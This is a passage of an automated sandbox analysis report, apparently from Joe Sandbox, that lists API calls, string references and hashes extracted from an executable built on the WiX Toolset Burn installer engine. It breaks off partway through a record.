                                                                                                                                                          • Failed to append SysNative directory., xrefs: 004447EA
                                                                                                                                                          • Failed to run MSU process, xrefs: 00444A00
                                                                                                                                                          • /log:, xrefs: 00444933
                                                                                                                                                          • Failed to get action arguments for MSU package., xrefs: 00444854
                                                                                                                                                          • Failed to get cached path for package: %ls, xrefs: 00444889
                                                                                                                                                          • Failed to format MSU install command., xrefs: 0044490D
                                                                                                                                                          • SysNative\, xrefs: 004447DA
                                                                                                                                                          • Failed to build MSU path., xrefs: 004448D9
                                                                                                                                                          • Failed to append log switch to MSU command-line., xrefs: 00444947
                                                                                                                                                          • Failed to determine WOW64 status., xrefs: 004447A4
                                                                                                                                                          • Failed to append log path to MSU command-line., xrefs: 00444973
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                          • String ID: /log:$"%ls" "%ls" /quiet /norestart$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to run MSU process$SysNative\$WixBundleExecutePackageCacheFolder$d:\a\wix\wix\src\burn\engine\msuengine.cpp$wusa.exe
                                                                                                                                                          • API String ID: 1400713077-2343657752
                                                                                                                                                          • Opcode ID: 662ce87fff23f54738fccaa3b9f168a38722e429813bdc5ffcea8d5cdfaf8587
                                                                                                                                                          • Instruction ID: defc4134fd27bc1e909fdb42362613f2f60c5b61988664cbd9993bbfb2b7bacc
                                                                                                                                                          • Opcode Fuzzy Hash: 662ce87fff23f54738fccaa3b9f168a38722e429813bdc5ffcea8d5cdfaf8587
                                                                                                                                                          • Instruction Fuzzy Hash: B7A1B231E80215BBEF229E94CD4AFEF7A65EF44714F100167FA00BA2D1D3B89D509A9D
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00470106: UuidCreate.RPCRT4(?), ref: 00470129
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 00451554
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 0045156D
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateUuid
                                                                                                                                                          • String ID: %ls$%ls /pipe %ls$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate section name.$Failed to append netfx chainer args.$Failed to append user args.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$d:\a\wix\wix\src\burn\engine\netfxchainer.cpp
                                                                                                                                                          • API String ID: 264999607-1450254906
                                                                                                                                                          • Opcode ID: 57d051f4946af6fa4f05c07971b04e734d6ff694880a0b95cbc3366a853a9804
                                                                                                                                                          • Instruction ID: 1f8aa43ca4d0cd281d94d5f43fd3c7c9b0a85d177df900599632a704ca659e79
                                                                                                                                                          • Opcode Fuzzy Hash: 57d051f4946af6fa4f05c07971b04e734d6ff694880a0b95cbc3366a853a9804
                                                                                                                                                          • Instruction Fuzzy Hash: 91A1C331E40328BBDB219BA4CC46FDE7BB4AB05711F114166FD08FB2A2E6789D44CB58
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array$Failed to resize Detect code array$Failed to resize Patch code array$Failed to resize Upgrade code array$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$d:\a\wix\wix\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                          • API String ID: 0-1578577752
                                                                                                                                                          • Opcode ID: d9c08f43171cb7e396c93af4fc6fbede44599843a612a70294b969b3338caf90
                                                                                                                                                          • Instruction ID: a05afecbbe306ca99dc7505c35a26fb8fb16c08d2cccaf158de5d8b2ae0baf15
                                                                                                                                                          • Opcode Fuzzy Hash: d9c08f43171cb7e396c93af4fc6fbede44599843a612a70294b969b3338caf90
                                                                                                                                                          • Instruction Fuzzy Hash: 2191D231784305BBDB11CF54CC86F9E3B71EB89B11F20116AF611BB2E1DAB8A941DB49
                                                                                                                                                          APIs
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,?,00000001,?,00000018,?,00000000,00000000), ref: 0040E0F0
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,?,00000001,00000048), ref: 0040E316
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringType
                                                                                                                                                          • String ID: AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to set symbol value.$NOT$Symbol was too long: %ls$d:\a\wix\wix\src\burn\engine\condition.cpp
                                                                                                                                                          • API String ID: 4177115715-4053269478
                                                                                                                                                          • Opcode ID: acc0b46cc2cc7ef0e527b5bcc95e497c9fdaa649643eb190be8ab126741d43f1
                                                                                                                                                          • Instruction ID: 707170ce4314e62120d2e792c8b80d09a3f15f06475cb7fe9325cbaffe026237
                                                                                                                                                          • Opcode Fuzzy Hash: acc0b46cc2cc7ef0e527b5bcc95e497c9fdaa649643eb190be8ab126741d43f1
                                                                                                                                                          • Instruction Fuzzy Hash: 56020271640201FAEB248F56C889BBA7B64EB04704F504D6BF904BA2C1D3BDD9A1C799
                                                                                                                                                          APIs
                                                                                                                                                          • GetExitCodeThread.KERNEL32(6C696146,?,00000001,004220B6,00000000,000000FF,000000B0,00000000,?,004220B6,004220B6,?,?,?,000000B0), ref: 0044B271
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0044B27F
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\apply.cpp, xrefs: 0044B2A3, 0044B2A9, 0044B2BD, 0044B520, 0044B52B, 0044B548, 0044B594
                                                                                                                                                          • Failed to execute uninstall MSI compatible package., xrefs: 0044B567
                                                                                                                                                          • Failed to execute MSP package., xrefs: 0044B3C6
                                                                                                                                                          • Failed to wait for cache check-point., xrefs: 0044B553
                                                                                                                                                          • Failed to execute begin MSI transaction action., xrefs: 0044B492
                                                                                                                                                          • Failed to execute dependency action., xrefs: 0044B461
                                                                                                                                                          • Failed to get cache thread exit code., xrefs: 0044B2AF
                                                                                                                                                          • Failed to execute package provider registration action., xrefs: 0044B434
                                                                                                                                                          • Failed to execute commit MSI transaction action., xrefs: 0044B4BF
                                                                                                                                                          • Invalid execute action., xrefs: 0044B57B
                                                                                                                                                          • Failed to execute EXE package., xrefs: 0044B354
                                                                                                                                                          • Failed to execute MSI package., xrefs: 0044B38D
                                                                                                                                                          • Failed to execute related bundle., xrefs: 0044B2E4
                                                                                                                                                          • Failed to execute MSU package., xrefs: 0044B407
                                                                                                                                                          • Failed to execute BUNDLE package., xrefs: 0044B31C
                                                                                                                                                          • Cache thread exited unexpectedly with exit code: %u., xrefs: 0044B536
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CodeErrorExitLastThread
                                                                                                                                                          • String ID: Cache thread exited unexpectedly with exit code: %u.$Failed to execute BUNDLE package.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute begin MSI transaction action.$Failed to execute commit MSI transaction action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to execute related bundle.$Failed to execute uninstall MSI compatible package.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$d:\a\wix\wix\src\burn\engine\apply.cpp
                                                                                                                                                          • API String ID: 1352145401-1463600071
                                                                                                                                                          • Opcode ID: 8e502bd8ab876c84e0da2fdbe1041f0dac8c37ff456ed94aa44118e714ee08cd
                                                                                                                                                          • Instruction ID: c94ca12f10d659596cd7d4aab0546f69f7586f83fcd9201a77ede8270b6ad299
                                                                                                                                                          • Opcode Fuzzy Hash: 8e502bd8ab876c84e0da2fdbe1041f0dac8c37ff456ed94aa44118e714ee08cd
                                                                                                                                                          • Instruction Fuzzy Hash: 73B1A171A4021ABBFF21DE45CC46FAB7B68EB05B54F114066B904BB2D1E3B4ED408BD8
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00405B5B: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000001,00000000,?,00417261,00000001,00000080,?,00000000), ref: 00405B73
                                                                                                                                                            • Part of subcall function 00405B5B: GetLastError.KERNEL32(?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140,?,?,?,?,?,000000B0), ref: 00405B80
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,00000080,000000B0,?,00000000,00000000,00000000,?,?,?,?,?,00000001,?,?), ref: 004182A2
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0041852E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateCriticalErrorFileInitializeLastSection
                                                                                                                                                          • String ID: %s\%s$Failed to build variable registry key path.$Failed to create registration variable key.$Failed to delete registration variable value.$Failed to enumerate value %u$Failed to get variable value.$Failed to query registration variable count.$Failed to read variables.$Failed to set variable value.$Failed to write state to file: %ls$Unsupported variable type.$d:\a\wix\wix\src\burn\engine\registration.cpp$feclient.dll$variables
                                                                                                                                                          • API String ID: 620435854-861404221
                                                                                                                                                          • Opcode ID: c1cb9f6d7b499544936bfcfd0ccbc5f299ad0c95d2ff2fce4cf53f29b787e3c2
                                                                                                                                                          • Instruction ID: 254c8dd916608e62c7d600b8e5f510bd513f47cce8482f30e51c00856938d190
                                                                                                                                                          • Opcode Fuzzy Hash: c1cb9f6d7b499544936bfcfd0ccbc5f299ad0c95d2ff2fce4cf53f29b787e3c2
                                                                                                                                                          • Instruction Fuzzy Hash: 6881F931D40629BBDB229A948C4AFDF7B38EB04714F15012BFA00761D0FBBD5D818B99
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473812
                                                                                                                                                          Strings
                                                                                                                                                          • Failed get attributes on ATOM unknown element., xrefs: 004735CB
                                                                                                                                                          • Failed to allocate ATOM category scheme., xrefs: 00473674
                                                                                                                                                          • scheme, xrefs: 00473649
                                                                                                                                                          • Failed to parse unknown ATOM category element: %ls, xrefs: 004737E8
                                                                                                                                                          • Failed to process all ATOM category elements., xrefs: 004737C7
                                                                                                                                                          • term, xrefs: 0047368A
                                                                                                                                                          • Failed to get child nodes of ATOM category element., xrefs: 00473746
                                                                                                                                                          • Failed to process all ATOM category attributes., xrefs: 00473701
                                                                                                                                                          • label, xrefs: 00473607
                                                                                                                                                          • Failed to allocate ATOM category term., xrefs: 00473715
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 004735DA, 004737D6, 004737F7
                                                                                                                                                          • Failed to allocate ATOM category label., xrefs: 00473633
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM category label.$Failed to allocate ATOM category scheme.$Failed to allocate ATOM category term.$Failed to get child nodes of ATOM category element.$Failed to parse unknown ATOM category element: %ls$Failed to process all ATOM category attributes.$Failed to process all ATOM category elements.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$label$scheme$term
                                                                                                                                                          • API String ID: 3341692771-2380824584
                                                                                                                                                          • Opcode ID: 4afee97bc1c9c2f494c4c48876c66ba7ced0285145ab975b9439d940afc83522
                                                                                                                                                          • Instruction ID: 6ad69de506c9f22f2a11d2c79a7386fc0e59224c55d27ba36433fc486aa4bae8
                                                                                                                                                          • Opcode Fuzzy Hash: 4afee97bc1c9c2f494c4c48876c66ba7ced0285145ab975b9439d940afc83522
                                                                                                                                                          • Instruction Fuzzy Hash: 7781F571A44205FBDB119F94CC45F9E3775EB84B16F20806AF519B72E0EB789B00EB58
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473AC0
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to parse unknown ATOM content element: %ls, xrefs: 00473A69
                                                                                                                                                          • crypt32.dll, xrefs: 004739FB
                                                                                                                                                          • Failed to allocate ATOM content scheme., xrefs: 0047399D
                                                                                                                                                          • type, xrefs: 004738D4
                                                                                                                                                          • Failed to get child nodes of ATOM content element., xrefs: 004739CE
                                                                                                                                                          • Failed to allocate ATOM content value., xrefs: 00473A9A
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 004738A7, 00473A78, 00473AA9
                                                                                                                                                          • Failed get attributes on ATOM unknown element., xrefs: 00473898
                                                                                                                                                          • Failed to process all ATOM content elements., xrefs: 00473A55
                                                                                                                                                          • feclient.dll, xrefs: 00473A8E
                                                                                                                                                          • Failed to process all ATOM content attributes., xrefs: 00473989
                                                                                                                                                          • url, xrefs: 00473912
                                                                                                                                                          • Failed to allocate ATOM content type., xrefs: 004738FC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM content scheme.$Failed to allocate ATOM content type.$Failed to allocate ATOM content value.$Failed to get child nodes of ATOM content element.$Failed to parse unknown ATOM content element: %ls$Failed to process all ATOM content attributes.$Failed to process all ATOM content elements.$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$feclient.dll$type$url
                                                                                                                                                          • API String ID: 3341692771-3243200183
                                                                                                                                                          • Opcode ID: 0c2851f67ff8830eb28b7875337647320f33c5e7409bbbf29388d7028fa9f810
                                                                                                                                                          • Instruction ID: ff25ad79579f58cbfb13893a4404c1c09f346fde25b9080a1c9eadb829d837f5
                                                                                                                                                          • Opcode Fuzzy Hash: 0c2851f67ff8830eb28b7875337647320f33c5e7409bbbf29388d7028fa9f810
                                                                                                                                                          • Instruction Fuzzy Hash: D581D675A40204FBDB01DF94CC46FEE7775AB44715F20406AFA09BB2E0DB749A40EB98
                                                                                                                                                          APIs
                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,crypt32.dll,?,00000001), ref: 00408AC7
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,004095F6,?,?,?), ref: 00408AD0
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleMutexRelease
                                                                                                                                                          • String ID: Failed to connect to unelevated process.$Failed to create elevated logging thread.$Failed to create finished event for logging thread.$Failed to create log event for logging thread.$Failed to create the message window.$Failed to open elevated log.$Failed to pump messages from parent process.$crypt32.dll$d:\a\wix\wix\src\burn\engine\engine.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 4207627910-4066673956
                                                                                                                                                          • Opcode ID: 7b6137b488b4d3e8eef0cac8dffa08ca2de5702372b47df60aac6b710b6fe480
                                                                                                                                                          • Instruction ID: fb83d1f43845b470b7c0cd89ab569b688db879491577e5f3ee52a1d52e6f885f
                                                                                                                                                          • Opcode Fuzzy Hash: 7b6137b488b4d3e8eef0cac8dffa08ca2de5702372b47df60aac6b710b6fe480
                                                                                                                                                          • Instruction Fuzzy Hash: FF51F873A40626B7D7229A508D49FE7BA5CBF44750F11423BF948F61C1EB78AC108BE9
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00418D36,InstallerVersion,InstallerVersion,00000000,00418D36,InstallerName,InstallerName,00000000,00418D36,Date,InstalledDate,00000000,00418D36,LogonUser), ref: 004175C0
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled$d:\a\wix\wix\src\burn\engine\registration.cpp
                                                                                                                                                          • API String ID: 3535843008-3664035481
                                                                                                                                                          • Opcode ID: 4abd3f1c90f133ad8869e101a0d51fa6af881ab281b868e4a375fa50997a65f5
                                                                                                                                                          • Instruction ID: 96314f998e5ae91cc3e2fdc8bd364f86dd058d196683eca20ee353ff3edf4426
                                                                                                                                                          • Opcode Fuzzy Hash: 4abd3f1c90f133ad8869e101a0d51fa6af881ab281b868e4a375fa50997a65f5
                                                                                                                                                          • Instruction Fuzzy Hash: FB51E631BC5B24BAE72275018C0BFEF2E399B50F15F214517B904791D1A7EC9E80979D
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %ls.Cache$%ls.Log$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent logging pipe.$Failed to open companion process with PID: %u$Failed to open parent cache pipe: %ls$Failed to open parent pipe: %ls$Failed to verify parent cache pipe: %ls$Failed to verify parent logging pipe: %ls$Failed to verify parent pipe: %ls$clbcatq.dll$comres.dll$d:\a\wix\wix\src\burn\engine\burnpipe.cpp$feclient.dll$msasn1.dll
                                                                                                                                                          • API String ID: 0-1224607240
                                                                                                                                                          • Opcode ID: 2af1cc1ea411f287583b62096cb0a282a61ea4cd0633adce69cfe2dbfd1d451a
                                                                                                                                                          • Instruction ID: 5a83bd40cafb034449813dc0a92a8bdc490791816c21fe9b43c600f0ce52ab9f
                                                                                                                                                          • Opcode Fuzzy Hash: 2af1cc1ea411f287583b62096cb0a282a61ea4cd0633adce69cfe2dbfd1d451a
                                                                                                                                                          • Instruction Fuzzy Hash: 4551E732A81625BBDB12A651CD06FDF7A659F04B50F110513FA04BA1D0E3E8ADA097DE
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,000000FF,?,?,00000078,00000000), ref: 00471BEB
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00471BF9
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00471C57
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00471C66
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00471EE0
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00471EEF
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                          • String ID: Content-Length not returned for URL: %ls$Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$Range request not supported for URL: %ls$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 2028584396-2432748424
                                                                                                                                                          • Opcode ID: 586e683aa797c212f4a06f1cd9a26201b0ddc053e05e67015a8c8a4cc637efe0
                                                                                                                                                          • Instruction ID: 5a7bf328f4068dede46326ed7f675698588ede90606f7e63601f7e1e10918e9f
                                                                                                                                                          • Opcode Fuzzy Hash: 586e683aa797c212f4a06f1cd9a26201b0ddc053e05e67015a8c8a4cc637efe0
                                                                                                                                                          • Instruction Fuzzy Hash: 85A1B371E00219ABDB219F998C45FEF7B79EF44714F11812AFD08B72A0E7789D409B98
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0041692D
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004168D7
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeapString$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$d:\a\wix\wix\src\burn\engine\registration.cpp
                                                                                                                                                          • API String ID: 3351553325-1602946341
                                                                                                                                                          • Opcode ID: e90e4914ff4a170bef47ba731f7bfddf83fec363cc606fac63d5e4d8c6354bfa
                                                                                                                                                          • Instruction ID: df46a41de04da4091ebf1c336247451dece6131d8de4958a5fa93105c896dec4
                                                                                                                                                          • Opcode Fuzzy Hash: e90e4914ff4a170bef47ba731f7bfddf83fec363cc606fac63d5e4d8c6354bfa
                                                                                                                                                          • Instruction Fuzzy Hash: 54811371B40304BBDB10AA558C46FAF77699F80B14F22406FFA04BB2D1E7B8D941879C
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(004777B0), ref: 00408E14
                                                                                                                                                          • PostMessageW.USER32(004777B0,00000010,00000000,00000000), ref: 00408E27
                                                                                                                                                          Strings
                                                                                                                                                          • WixBundleOriginalSource, xrefs: 00408C6A
                                                                                                                                                          • Failed to set layout directory variable to value provided from command-line., xrefs: 00408D61
                                                                                                                                                          • Failed to set command line action variable., xrefs: 00408CFE
                                                                                                                                                          • Failed to query registration., xrefs: 00408C4F
                                                                                                                                                          • Failed to check global conditions, xrefs: 00408BEE
                                                                                                                                                          • Failed to open log., xrefs: 00408BA3
                                                                                                                                                          • WixBundleLayoutDirectory, xrefs: 00408D50
                                                                                                                                                          • Failed to create the message window., xrefs: 00408C2C
                                                                                                                                                          • msasn1.dll, xrefs: 00408B83
                                                                                                                                                          • Failed to load BootstrapperExtensions., xrefs: 00408D91
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\engine.cpp, xrefs: 00408BB5
                                                                                                                                                          • Failed to set registration variables., xrefs: 00408D28
                                                                                                                                                          • WixBundleCommandLineAction, xrefs: 00408CED
                                                                                                                                                          • clbcatq.dll, xrefs: 00408CEC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostWindow
                                                                                                                                                          • String ID: Failed to check global conditions$Failed to create the message window.$Failed to load BootstrapperExtensions.$Failed to open log.$Failed to query registration.$Failed to set command line action variable.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$WixBundleCommandLineAction$WixBundleLayoutDirectory$WixBundleOriginalSource$clbcatq.dll$d:\a\wix\wix\src\burn\engine\engine.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 3618638489-23188151
                                                                                                                                                          • Opcode ID: bc27e21bed054997a685aacdfef09e9d6963caa88466dac64bd5853b373689fb
                                                                                                                                                          • Instruction ID: 4ca616b25fd78b34896fa9f907fbd0697fb01d8b45450ce7fbeb8445ebd727a5
